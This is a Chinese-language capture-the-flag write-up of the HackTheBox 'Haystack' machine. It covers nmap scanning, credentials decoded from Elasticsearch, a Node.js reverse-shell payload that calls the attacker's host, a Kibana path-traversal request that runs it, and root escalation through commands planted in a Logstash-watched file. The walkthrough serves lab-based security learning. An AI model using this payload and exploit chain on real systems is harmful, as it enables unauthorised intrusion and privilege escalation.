实战HackTheBox里的Haystack(文章末尾有两个微信小程序抽奖活动~~)

第一步,在主机上运行Nmap扫描以发现正在运行的服务:

root@kali:~/Documents/haystack# nmap -A -oN scan 10.10.10.115
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-14 17:23 UTC
Nmap scan report for 10.10.10.115
Host is up (0.017s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
|   256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_  256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp   open  http    nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open  http    nginx 1.12.2
| http-methods: 
|_  Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (92%), Linux 3.10 - 4.11 (90%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   16.13 ms 10.10.12.1
2   17.06 ms ip-10-10-10-115.eu-west-2.compute.internal (10.10.10.115)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.78 seconds

从输出中,我们可以看到SSH在22上运行,而nginx Web服务器在80和9200上运行。当浏览到端口80上的页面时,您会在干草堆中的针上看到一个大图像。我下载了此图像并在文件上运行了字符串。

root@kali:~/Downloads/haystack# strings needle.jpg
O'bu
N{M3
:t6Q6
STW5
*Oo!;.o|?>
.n2FrZ
rrNMz
#=pMr
BN2I
,'*'
I$f2/<-iy
bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==

在字符串输出的底部,您可以看到一个长字符串,该字符串似乎是用base64编码的。

root@kali:~/Downloads/haystack# echo 'bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==' | base64 -d
la aguja en el pajar es "clave"

然后,我决定浏览至http://10.10.10.115:9200上的端口9200。它返回了一些JSON格式的数据,表明它正在托管Elasticsearch数据库:

{
     
  "name" : "iQEYHgS",
  "cluster_name" : "elasticsearch",
  "cluster_uuid" : "pjrX7V_gSFmJY-DxP4tCQg",
  "version" : {
     
    "number" : "6.4.2",
    "build_flavor" : "default",
    "build_type" : "rpm",
    "build_hash" : "04711c2",
    "build_date" : "2018-09-26T13:34:09.098244Z",
    "build_snapshot" : false,
    "lucene_version" : "7.4.0",
    "minimum_wire_compatibility_version" : "5.6.0",
    "minimum_index_compatibility_version" : "5.0.0"
  },
  "tagline" : "You Know, for Search"
}

然后,我浏览到http://10.10.10.115:9200/_aliases以查看正在使用的索引:

{
     ".kibana":{
     "aliases":{
     }},"bank":{
     "aliases":{
     }},"quotes":{
     "aliases":{
     }}}

从输出中可以看到,有3个索引。Kibana、库和quotes。

现在,我以非常混乱的方式执行了下一步。可能有一种更清洁的方法。从图像的解码后的base 64字符串中,我知道感兴趣的单词在“ clave”中。因此,我依次浏览了每个索引并按CTRL + F并搜索了clave这个词。我在引号索引中有2个结果,两个结果都带有附加的base 64字符串:

{
     "quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}
{
     "quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}

然后,我使用与以前相同的方法对这些字符串进行解码。

root@kali:~/Downloads/haystack# echo 'cGFzczogc3BhbmlzaC5pcy5rZXk=' | base64 -d
pass: spanish.is.key
root@kali:~/Downloads/haystack# echo 'dXNlcjogc2VjdXJpdHkg' | base64 -d
user: security

因此,我们现在有了一些登录凭据,使您可以通过SSH访问计算机。从索引中可以看到,很可能安装了Kibana。通过SSH登录后,我签出了kibana配置文件以查看其设置方式。

root@kali:~/Downloads/haystack# ssh [email protected]
[email protected]'s password: 
Last login: Tue Aug  6 15:52:37 2019 from 10.10.14.39
[security@haystack ~]$ cat /etc/kibana/kibana.yml 
# Kibana is served by a back end server. This setting specifies the port to use.
server.port: 5601

# Specifies the address to which the Kibana server will bind. IP addresses and host names are both valid values.
# The default is 'localhost', which usually means remote machines will not be able to connect.
# To allow connections from remote users, set this parameter to a non-loopback address.
server.host: "127.0.0.1"

我们可以看到它正在端口5601上运行,但是它仅绑定到本地主机,并且不能远程访问。经过一番谷歌搜索后,我在此版本的Kibana中发现了一个LFI漏洞,可用于提升特权。

执行此漏洞的第一步是上传可以由kibana执行的javascript shell。我通过python SimpleHTTPServer在我的kali机器上托管了以下javascript文件。当然,请确保更改IP地址以匹配我的openVPN IP。

(function(){
     
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "172.18.0.1", function(){
     
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();

然后,我使用curl将文件下载到haystack计算机上。

[security@haystack ~]$ cd /tmp
[security@haystack tmp]$  curl http://10.10.13.111:8000/test.js --output jim.js

下一步是在Kali机器上启动一个netcat侦听器,一旦运行,它就会接收到反向shell生成的流量。如JavaScript文件中所述,此侦听器需要在端口1337上运行。

root@kali:~/Downloads# nc -lvp 1337 
listening on [any] 2601 ...

然后,按照GitHub上LFI漏洞页面中所述,将GET请求发送到kibana。我是用curl做的。该请求必须来自本地主机,因为kibana仅可在本地访问。

[security@haystack tmp]$ curl -X GET 'http://127.0.0.1:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../tmp/jim.js'

然后查看监听器,我们可以看到已经建立了连接。键入ls会成功列出当前目录。

root@kali:~/Downloads# nc -lvp 1337
listening on [any] 2601 ...
10.10.10.111: inverse host lookup failed: Unknown host
connect to [10.10.13.111] from (UNKNOWN) [10.10.10.115] 56236
ls
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

我使用python升级到了更加用户友好的bash shell。您还可以从whoami中看到我们现在以kibana用户身份访问机器:

python -c 'import pty; pty.spawn("/bin/bash")' 

bash-4.2$ whoami
whoami
kibana

现在,我们需要找到一个可以某种方式滥用以允许特权升级到root用户的进程。通过运行ps aux,我们可以看到所有正在运行的进程。由此可知logstash以root用户身份运行。

[security@haystack ~]$ ps aux | grep logstash
root       6147 22.4  7.5 2658288 293184 ?      SNsl 16:18   0:33 /bin/java -Xms500m -Xmx500m -XX:+UseParNewGC -XX:+UseConcMarkSweepGC -XX:CMSInitiatingOccupancyFraction=75 -XX:+UseCMSInitiatingOccupancyOnly -Djava.awt.headless=true -Dfile.encoding=UTF-8 -Djruby.compile.invokedynamic=true -Djruby.jit.threshold=0 -XX:+HeapDumpOnOutOfMemoryError -Djava.security.egd=file:/dev/urandom -cp /usr/share/logstash/logstash-core/lib/jars/animal-sniffer-annotations-1.14.jar:/usr/share/logstash/logstash-core/lib/jars/commons-codec-1.11.jar:/usr/share/logstash/logstash-core/lib/jars/commons-compiler-3.0.8.jar:/usr/share/logstash/logstash-core/lib/jars/error_prone_annotations-2.0.18.jar:/usr/share/logstash/logstash-core/lib/jars/google-java-format-1.1.jar:/usr/share/logstash/logstash-core/lib/jars/gradle-license-report-0.7.1.jar:/usr/share/logstash/logstash-core/lib/jars/guava-22.0.jar:/usr/share/logstash/logstash-core/lib/jars/j2objc-annotations-1.1.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-annotations-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-core-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-databind-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-dataformat-cbor-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/janino-3.0.8.jar:/usr/share/logstash/logstash-core/lib/jars/jruby-complete-9.1.13.0.jar:/usr/share/logstash/logstash-core/lib/jars/jsr305-1.3.9.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-api-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-core-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-slf4j-impl-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/logstash-core.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.commands-3.6.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.contenttype-3.4.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.expressions-3.4.300.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.filesystem-1.3.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.jobs-3.5.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.resources-3.7.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.runtime-3.7.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.app-1.3.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.common-3.6.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.preferences-3.4.1.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.registry-3.5.101.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.jdt.core-3.10.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.osgi-3.7.1.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.text-3.5.101.jar:/usr/share/logstash/logstash-core/lib/jars/slf4j-api-1.7.25.jar org.logstash.Logstash --path.settings /etc/logstash

我看了一下logstash配置:

bash-4.2$ cd /etc/logstash/conf.d/
bash-4.2$ ls
ls
filter.conf  input.conf  output.conf
bash-4.2$ cat output.conf
cat output.conf 
output {
     
  if [type] == "execute" {
     
    stdout {
      codec => json }
    exec {
     
      command => "%{comando} &"
    }
  }
}
bash-4.2$ cat input.conf 
cat input.conf 
input {
     
  file {
     
    path => "/opt/kibana/logstash_*"
    start_position => "beginning"
    sincedb_path => "/dev/null"
    stat_interval => "10 second"
    type => "execute"
    mode => "read"
  }
}
bash-4.2$ cat filter.conf 
cat filter.conf 
filter {
     
  if [type] == "execute" {
     
    grok {
     
      match => {
      "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
    }
  }
}
bash-4.2$

你可以看到logstash配置了3个文件。输入,输出和过滤器。

Input.conf显示它从/ opt / kibana / logstash_ *收集数据。每10秒检查一次。

然后,Filter.conf显示它已被过滤以查找与Ejecutar comando匹配的消息:

然后output.conf显示动态字符串comando中的命令已执行。

有了这些信息,我们现在知道我们需要在/ opt / kibana / logstash_ *中提供数据,其中包括我们要运行的命令。该命令将由logstash执行,而logstash又以root用户身份运行。

Logstash对我来说很新。我不确定要在执行过滤器捕获的命令时需要在日志文件中使用的格式。因此,我进行了一次祈祷技术,将各种可能的格式加载到文件中,这些格式将逐行执行直到一个可行。该文件可以在这里看到:

comando: cat /root/root.txt > /tmp/good
cat /root/root.txt > /tmp/good2
Ejecutar comando: cat /root/root.txt > /tmp/good3
GREEDYDATA:whoami > cat /root/root.txt > /tmp/good4
Ejecutar\s*comando\s*: cat /root/root.txt > /tmp/good5

我通过python SimpleHTTPServer将这个文件托管在我的Kali机器上,并将其下载到haystack机器的/ opt / kibana目录中。

bash-4.2$ cd /opt/kibana/

curl 10.10.14.27:8000/logstash_i --output logstash_i
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   180  100   180    0     0   2964      0 --:--:-- --:--:-- --:--:--  2950

我等待了input.conf中配置的10秒钟,以便处理该文件。然后,我检查了/ tmp目录,看是否已创建我的文件。

bash-4.2$ ls /tmp
good3

如你所见,good3文件已输出到/ tmp。我确实尝试仅使用执行的行来重新创建logstash_j文件。但是由于某种原因,它没有用。我仍然不是100%知道应该是什么格式。我所知道的是我曾经使用过的东西,即使有点混乱。然后,我在文件上运行cat来查看标志并完成靶场。

bash-4.2$ cat /tmp/good
[REDACTED]

实战HackTheBox里的Haystack(文章末尾有两个微信小程序抽奖活动~~)_第1张图片
实战HackTheBox里的Haystack(文章末尾有两个微信小程序抽奖活动~~)_第2张图片

关注:Hunter网络安全 获取更多资讯
网站:bbs.kylzrv.com
CTF团队:Hunter网络安全
文章:Xtrato
排版:Hunter-匿名者

你可能感兴趣的:(技术,HackTheBox,Haystack,实战,安全,经验分享)